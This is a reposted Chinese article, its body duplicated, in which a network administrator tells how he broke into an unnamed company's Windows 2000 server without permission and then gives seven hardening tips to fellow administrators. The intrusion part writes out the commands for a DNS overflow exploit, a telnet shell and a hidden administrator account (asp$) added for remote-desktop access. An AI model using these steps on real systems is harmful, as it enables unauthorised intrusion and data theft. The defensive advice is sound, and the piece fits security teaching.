神马文学网由安全检测引发的思考—对企业网管几点忠告
来源:百度文库 编辑:神马文学网 时间:2024/04/30 01:29:07
从一次友情安全检测谈起。前段时间,我上某企业的网站查找资料。看网页做得极其精致,于是想看看安全性到底如何。网站是Asp动态页面,采用的是某企业网站系统……
‘);
从一次友情安全检测谈起。前段时间,我上某企业的网站查找资料。看网页做得极其精致,于是想看看安全性到底如何。网站是Asp动态页面,采用的是某企业网站系统。
先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:
ping www.*.com
得知ip地址为:202.2##.*.196
通过http://www.webhosting.info/查询得知这是一台独立的服务器,只有一个站点。
用扫描器看看,扫描结果,该服务器开了如下端口
以下是引用片段:
80 53 1433 25 3389
看来这台服务器,开了Web端口,这是当然的,因为要运行网站吗。
开了53端口,这是DNS端口,看来该Web主机也是个DNS服务器。
开了1433端口,这是SQL-Server数据库端口,因为是Web服务器,所有要运行数据库了。
开了25端口,看来这还是个邮件服务器。
开了3389端口,可以远程登录。
当时感叹,这台服务器真能干呀!
首先对asp页面进行了初步测试,看来没有什么明显的漏洞。既然开了53端口,那就看看DNS溢出。找了一个dns溢出工具,在命令行下敲入如下命令:
dns -s 202.2##.*.196
显示如下:(图1)
图1
竟然存在DNS溢出漏洞!这个管理员真是失职,连补丁都没有打。
服务器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
继续在命令行下,敲入如下命令:
dns -t2000all 202.2##.*.196 1052
显示如下:(图2)
图2
溢出成功!重新打开另外一个命令提示符,敲入如下命令:
telnet 202.2##.*.196 1100
速度很快,返回一个shell,溢出成功。
在telnet界面中敲入如下命令:
net query
显示如下:(图3)
图3
以下是引用片段:
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator console 0 已断开 . 2007-11-7 17:51
看来管理员不在线。
进去看看,在Telnet命令提示符下敲入如下命令
以下是引用片段:
net user asp$ "test" /add
net localgroup administrators asp$ /add
建立一个具有管理员权限的asp$账户。
在本机运行“mstsc”,打开“远程桌面连接工具”,
输入IP地址:202.2##.*.196
用户名:asp$
密码:test
连接......
成功进入!
打开“管理工具”,发现这台主机,还是一个域控制器!
打开“域用户和计算机”,域成员竟然有43511个。看来这个企业的局域网的规模不小。(图4)
图4
然后看数据库,果然是SQL-SERVER,有两个数据库,一个是web数据库,一个是企业的数据库,有销售、客户等资料。
邮件服务器采用的是WebEasyMail,账户和密码都是默认的,既然如此它也不在话下。
安全检测到此为止,删掉用户和相关痕迹,给管理员留言,撤人。
至此,完全控制了这台服务器。但是岂止如此,该企业的内部资料,局域网不用在你的掌握之中吗?
令人费解的是,为什么一台主机要兼web、数据库、邮件服务、域控制器这么多的角色呢?
随后的几天进行了几次这样的测试,发现这绝不是个别现象!特别是一些中小企业,往往一个web服务器、兼数据库、邮件服务器、域控制器中的两个或者几个角色。
鉴于次,我作为一个单位的网络管理员对我的同行们几点忠告:
1、打补丁。这应该是企业网络安全的基本要求,也是杜绝网络入侵的首要措施。将微软提供的各种重要系统安全补丁都打上,不要怕麻烦,因为被别人入侵后更麻烦。一旦有新的补丁发布,网络管理员将在发布后的4小时内下载并检查该补丁。鉴于网络所面临的重大风险,可能一个“紧急”的补丁还在测试当中就被发布了。在所有情况下,部门必须对补丁进行测试(无论是在补丁发布前测试或是一边部署一边测试),并进行相关的记录,以备审核和效果追踪。但是让人无奈的是,有部分企业的网络管理员,主机千疮百孔也不知道补一补。甚至有些管理员自作主张关闭了“自动更新”服务。就比如这位管理员到现在为止都没有打补丁,我写这篇文章时就是用这台服务器截的图。
2、服务器分离、专用。最好把web服务器、数据库服务器、邮件服务器、域控制器分离,各种服务器专用。这样不至于一个攻破全线崩溃。如果企业由于经济原因没有那么多的服务器,必须要做好服务器的安全配置。
3、做好安全部署。设置隔离区,把邮件服务器等放到该区,并把该区的服务器映射到外网的合法地址上以便nternet网上用户访问。严禁Internet网上用户到企业内部网的访问。允许企业内部网通过地址转换方式(NAT)访问nternet。允许拨号用户通过拨号访问服务器到企业内部网访问。
4、关闭没有用的服务。最少的服务就是最大的安全。我在测试中看到有些服务器开了DNS服务、DHCP服务、IIS等等,几乎把所有的服务都安装了。但是我看这些服务器根本就用不着它。但恰恰是这些无用的服务让服务器沦陷。另外比如打印、远程注册表操作,信息发送等不必要的服务都关掉。
5、复杂密码。网络管理员大都比较重视管理员密码,但对于数据库,企业邮箱系统都采用默认的密码,这就非常危险。我在测试中看到有的数据库服务器采用了默认的SA账户,以sa或者一些简单密码甚至干脆是空密码!尽管他的管理员密码如何强,但如果数据库用了空密码,那服务器照样被拿下。
6.如果没必要,IIS一定不要安装。如果非要安装一定要进行安全设置。我在测试中看到有些数据库服务器,却安装了IIS。
7、管理员必须会组策略、IPsec、日志查看。能够通过部署组策略使系统更安全,用IPsec进行网络安全的过滤,会查看各种日志(系统日志、安全日志、DNS日志、iis记录等)。要有灵敏的嗅觉,不然别人入侵了你还不知道。
为了企业网络的安全,也为了自己的饭碗,写出来与网络管理员们共勉。
‘);
从一次友情安全检测谈起。前段时间,我上某企业的网站查找资料。看网页做得极其精致,于是想看看安全性到底如何。网站是Asp动态页面,采用的是某企业网站系统。
先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:
ping www.*.com
得知ip地址为:202.2##.*.196
通过http://www.webhosting.info/查询得知这是一台独立的服务器,只有一个站点。
用扫描器看看,扫描结果,该服务器开了如下端口
以下是引用片段:
80 53 1433 25 3389
看来这台服务器,开了Web端口,这是当然的,因为要运行网站吗。
开了53端口,这是DNS端口,看来该Web主机也是个DNS服务器。
开了1433端口,这是SQL-Server数据库端口,因为是Web服务器,所有要运行数据库了。
开了25端口,看来这还是个邮件服务器。
开了3389端口,可以远程登录。
当时感叹,这台服务器真能干呀!
首先对asp页面进行了初步测试,看来没有什么明显的漏洞。既然开了53端口,那就看看DNS溢出。找了一个dns溢出工具,在命令行下敲入如下命令:
dns -s 202.2##.*.196
显示如下:(图1)
图1
竟然存在DNS溢出漏洞!这个管理员真是失职,连补丁都没有打。
服务器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
继续在命令行下,敲入如下命令:
dns -t2000all 202.2##.*.196 1052
显示如下:(图2)
图2
溢出成功!重新打开另外一个命令提示符,敲入如下命令:
telnet 202.2##.*.196 1100
速度很快,返回一个shell,溢出成功。
在telnet界面中敲入如下命令:
net query
显示如下:(图3)
图3
以下是引用片段:
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator console 0 已断开 . 2007-11-7 17:51
看来管理员不在线。
进去看看,在Telnet命令提示符下敲入如下命令
以下是引用片段:
net user asp$ "test" /add
net localgroup administrators asp$ /add
建立一个具有管理员权限的asp$账户。
在本机运行“mstsc”,打开“远程桌面连接工具”,
输入IP地址:202.2##.*.196
用户名:asp$
密码:test
连接......
成功进入!
打开“管理工具”,发现这台主机,还是一个域控制器!
打开“域用户和计算机”,域成员竟然有43511个。看来这个企业的局域网的规模不小。(图4)
图4
然后看数据库,果然是SQL-SERVER,有两个数据库,一个是web数据库,一个是企业的数据库,有销售、客户等资料。
邮件服务器采用的是WebEasyMail,账户和密码都是默认的,既然如此它也不在话下。
安全检测到此为止,删掉用户和相关痕迹,给管理员留言,撤人。
至此,完全控制了这台服务器。但是岂止如此,该企业的内部资料,局域网不用在你的掌握之中吗?
令人费解的是,为什么一台主机要兼web、数据库、邮件服务、域控制器这么多的角色呢?
随后的几天进行了几次这样的测试,发现这绝不是个别现象!特别是一些中小企业,往往一个web服务器、兼数据库、邮件服务器、域控制器中的两个或者几个角色。
鉴于次,我作为一个单位的网络管理员对我的同行们几点忠告:
1、打补丁。这应该是企业网络安全的基本要求,也是杜绝网络入侵的首要措施。将微软提供的各种重要系统安全补丁都打上,不要怕麻烦,因为被别人入侵后更麻烦。一旦有新的补丁发布,网络管理员将在发布后的4小时内下载并检查该补丁。鉴于网络所面临的重大风险,可能一个“紧急”的补丁还在测试当中就被发布了。在所有情况下,部门必须对补丁进行测试(无论是在补丁发布前测试或是一边部署一边测试),并进行相关的记录,以备审核和效果追踪。但是让人无奈的是,有部分企业的网络管理员,主机千疮百孔也不知道补一补。甚至有些管理员自作主张关闭了“自动更新”服务。就比如这位管理员到现在为止都没有打补丁,我写这篇文章时就是用这台服务器截的图。
2、服务器分离、专用。最好把web服务器、数据库服务器、邮件服务器、域控制器分离,各种服务器专用。这样不至于一个攻破全线崩溃。如果企业由于经济原因没有那么多的服务器,必须要做好服务器的安全配置。
3、做好安全部署。设置隔离区,把邮件服务器等放到该区,并把该区的服务器映射到外网的合法地址上以便nternet网上用户访问。严禁Internet网上用户到企业内部网的访问。允许企业内部网通过地址转换方式(NAT)访问nternet。允许拨号用户通过拨号访问服务器到企业内部网访问。
4、关闭没有用的服务。最少的服务就是最大的安全。我在测试中看到有些服务器开了DNS服务、DHCP服务、IIS等等,几乎把所有的服务都安装了。但是我看这些服务器根本就用不着它。但恰恰是这些无用的服务让服务器沦陷。另外比如打印、远程注册表操作,信息发送等不必要的服务都关掉。
5、复杂密码。网络管理员大都比较重视管理员密码,但对于数据库,企业邮箱系统都采用默认的密码,这就非常危险。我在测试中看到有的数据库服务器采用了默认的SA账户,以sa或者一些简单密码甚至干脆是空密码!尽管他的管理员密码如何强,但如果数据库用了空密码,那服务器照样被拿下。
6.如果没必要,IIS一定不要安装。如果非要安装一定要进行安全设置。我在测试中看到有些数据库服务器,却安装了IIS。
7、管理员必须会组策略、IPsec、日志查看。能够通过部署组策略使系统更安全,用IPsec进行网络安全的过滤,会查看各种日志(系统日志、安全日志、DNS日志、iis记录等)。要有灵敏的嗅觉,不然别人入侵了你还不知道。
为了企业网络的安全,也为了自己的饭碗,写出来与网络管理员们共勉。
由安全检测引发的思考—对企业网管几点忠告
由文化素质教育引发的对教育体制改革的几点思考
由文化素质教育引发的对教育体制改革的几点思考
由500强引发的对酒企业的思考
几点安全忠告
对中国周边安全环境的几点思考之二
对港口企业变动成本、毛利核算的几点思考
对女人的几点忠告
对女人的几点忠告
对教学原则的几点思考
对初中英语课堂教学的几点思考
对基层党组织直选的几点思考
对教学原则的几点思考
对文化建设问题的几点思考
对医院市场营销的几点思考
对区委书记叫板市委书记的几点思考
对电子商务征税的几点立法思考
对当前干部民主测评工作的几点思考
对纪检监察工作改革创新的几点思考
对规范反腐倡廉网络监督的几点思考
对大学生村官成长成才的几点思考
对如何科学问责的几点思考
对当前反腐倡廉形势的几点思考
对苏联亡党亡国的几点思考